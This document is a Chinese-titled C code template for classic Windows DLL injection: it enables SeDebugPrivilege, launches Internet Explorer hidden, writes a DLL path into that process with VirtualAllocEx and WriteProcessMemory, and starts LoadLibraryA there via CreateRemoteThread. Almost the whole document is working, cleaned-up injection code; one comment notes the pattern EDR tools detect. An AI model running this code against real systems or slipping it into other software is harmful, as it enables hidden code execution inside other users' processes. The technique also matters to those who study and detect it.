
远程线程模板(DLL注入)


此方法将DLL注入到目标进程中：把LoadLibraryA的地址作为CreateRemoteThread的lpStartAddress参数传入，即把LoadLibraryA函数当作CreateRemoteThread的线程过程函数ThreadProc来使用。

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

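DWORD GetProcessID(const char *ProcessName)
{
    /*
     * Return the PID of the first running process whose image name matches
     * ProcessName (case-insensitive), using a ToolHelp process snapshot.
     * Returns 0 when no process matches or the snapshot cannot be taken.
     *
     * Fix over the original: it returned from inside the loop on a match
     * without closing the snapshot handle, leaking it on every successful
     * lookup. The snapshot is now released on every path.
     */
    DWORD dwPid = 0;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);

    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot error\n");
        return 0;
    }

    for (BOOL bMore = Process32First(hProcessSnap, &pe32);
         bMore;
         bMore = Process32Next(hProcessSnap, &pe32))
    {
        if (_stricmp(pe32.szExeFile, ProcessName) == 0)
        {
            dwPid = pe32.th32ProcessID;
            break;  /* first match wins, as in the original */
        }
    }

    CloseHandle(hProcessSnap);
    return dwPid;
}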

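int EnableDebugPriv(const char *name)
{
    /*
     * Enable the named privilege (e.g. SE_DEBUG_NAME) in the current
     * process token. Returns 0 on success, 1 on failure.
     *
     * Fixes over the original:
     *  - the token handle was never closed; it is now released on every path
     *  - a failed LookupPrivilegeValue only printed a message and then went on
     *    to call AdjustTokenPrivileges with an uninitialized LUID
     *  - AdjustTokenPrivileges can return TRUE and still not grant the
     *    privilege (GetLastError() == ERROR_NOT_ALL_ASSIGNED, e.g. when the
     *    caller is not elevated); that case was reported as success
     */
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    int rc = 1;

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
                          &hToken))
    {
        printf("OpenProcessToken error\n");
        return 1;
    }

    if (!LookupPrivilegeValue(NULL, name, &luid))
    {
        printf("LookupPrivilege error!\n");
        goto out;
    }

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    {
        printf("AdjustTokenPrivileges error!\n");
        goto out;
    }
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
    {
        /* The call "succeeded" but the token does not hold the privilege. */
        printf("AdjustTokenPrivileges: privilege not held\n");
        goto out;
    }

    rc = 0;
out:
    CloseHandle(hToken);
    return rc;
}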

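BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
    /*
     * Classic CreateRemoteThread/LoadLibraryA injection: copy the DLL path
     * into the target process, then start a remote thread whose start routine
     * is LoadLibraryA and whose argument is that path. Returns TRUE once the
     * remote thread has been created and has finished, FALSE on any error.
     *
     * Fixes over the original: the process handle, the thread handle and the
     * remote buffer were leaked on every path (including success). All three
     * are now released via the cleanup label; the thread is waited on first so
     * the buffer is not freed while LoadLibraryA may still be reading it. An
     * empty path is rejected up front instead of being handed to the target.
     *
     * Note for defenders: the OpenProcess -> VirtualAllocEx ->
     * WriteProcessMemory -> CreateRemoteThread sequence with a kernel32 export
     * as the start address is the textbook injection pattern and is what
     * most EDR / ETW-based detections key on.
     */
    BOOL bOk = FALSE;
    HANDLE hRemoteProcess = NULL;
    HANDLE hRemoteThread = NULL;
    char *pszLibFileRemote = NULL;
    PTHREAD_START_ROUTINE pfnStartAddr = NULL;
    SIZE_T cbPath;

    if (DllFullPath == NULL || DllFullPath[0] == '\0')
    {
        printf("InjectDll: empty DLL path\n");
        return FALSE;
    }
    cbPath = (SIZE_T)lstrlen(DllFullPath) + 1;  /* include the terminating NUL */

    if (EnableDebugPriv(SE_DEBUG_NAME))
    {
        printf("add privilege error\n");
        return FALSE;
    }

    /* PROCESS_ALL_ACCESS is broader than this function needs; kept from the original. */
    hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId);
    if (hRemoteProcess == NULL)
    {
        printf("OpenProcess error\n");
        return FALSE;
    }

    /* Reserve room in the target for the DLL path string. */
    pszLibFileRemote = (char *)VirtualAllocEx(hRemoteProcess, NULL, cbPath,
                                              MEM_COMMIT, PAGE_READWRITE);
    if (pszLibFileRemote == NULL)
    {
        printf("VirtualAllocEx error\n");
        goto cleanup;
    }

    /* Copy the full DLL path into the target. */
    if (!WriteProcessMemory(hRemoteProcess, pszLibFileRemote, DllFullPath, cbPath, NULL))
    {
        printf("WriteProcessMemory error\n");
        goto cleanup;
    }

    /* kernel32 is mapped at the same address in every process, so the local
     * LoadLibraryA address is valid in the target too. */
    pfnStartAddr = (PTHREAD_START_ROUTINE)
        GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
    if (pfnStartAddr == NULL)
    {
        printf("GetProcAddress error\n");
        goto cleanup;
    }

    hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0,
                                       pfnStartAddr, pszLibFileRemote, 0, NULL);
    if (hRemoteThread == NULL)
    {
        printf("CreateRemoteThread error\n");
        goto cleanup;
    }

    /* Let LoadLibraryA finish before the path buffer is released. */
    WaitForSingleObject(hRemoteThread, INFINITE);
    bOk = TRUE;

cleanup:
    if (hRemoteThread != NULL)
    {
        CloseHandle(hRemoteThread);
    }
    if (pszLibFileRemote != NULL)
    {
        VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
    }
    CloseHandle(hRemoteProcess);
    return bOk;
}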

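int WINAPI WinMain(
       HINSTANCE hInstance,      // handle to current instance
       HINSTANCE hPrevInstance, // handle to previous instance
       LPSTR lpCmdLine,          // command line
       int nCmdShow              // show state
)
{
    /*
     * Demo driver: start iexplore.exe from the system drive, look up its PID
     * and inject Inject.dll from the current directory. Returns 0 on success,
     * 1 when any step fails.
     *
     * Fixes over the original: DllPath was built with an unbounded strcat()
     * into a MAX_PATH buffer (a long current directory overflowed it); the
     * GetSystemDirectory / GetCurrentDirectory / WinExec results were not
     * checked; and a failed PID lookup (0) was passed straight to InjectDll.
     * The fixed 1-second Sleep is a race with process start-up and is kept
     * only because the original relies on it.
     */
    static const char kIeRelPath[] = "Program Files\\Internet Explorer\\iexplore.exe";
    static const char kDllName[] = "\\Inject.dll";
    char Path[MAX_PATH];
    char DllPath[MAX_PATH];

    (void)hInstance;
    (void)hPrevInstance;
    (void)lpCmdLine;
    (void)nCmdShow;

    /* GetSystemDirectory returns the required size when the buffer is too small. */
    UINT nSys = GetSystemDirectory(Path, sizeof(Path));
    if (nSys == 0 || nSys >= sizeof(Path) || nSys < 3)
    {
        printf("GetSystemDirectory error\n");
        return 1;
    }
    Path[3] = '\0';  /* keep only the drive prefix, e.g. "C:\" */
    if (3 + sizeof(kIeRelPath) > sizeof(Path))
    {
        printf("browser path too long\n");
        return 1;
    }
    strcat(Path, kIeRelPath);

    /* WinExec reports success with a value greater than 31. */
    if (WinExec(Path, SW_HIDE) <= 31)
    {
        printf("WinExec error\n");
        return 1;
    }
    Sleep(1000);

    DWORD Pid = GetProcessID("iexplore.exe");
    if (Pid == 0)
    {
        printf("iexplore.exe not found\n");
        return 1;
    }

    /* GetCurrentDirectory returns the required size when the buffer is too small. */
    DWORD nCur = GetCurrentDirectory(sizeof(DllPath), DllPath);
    if (nCur == 0 || nCur >= sizeof(DllPath))
    {
        printf("GetCurrentDirectory error\n");
        return 1;
    }
    if (nCur + sizeof(kDllName) > sizeof(DllPath))  /* sizeof includes the NUL */
    {
        printf("DLL path too long\n");
        return 1;
    }
    strcat(DllPath, kDllName);

    return InjectDll(DllPath, Pid) ? 0 : 1;
}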
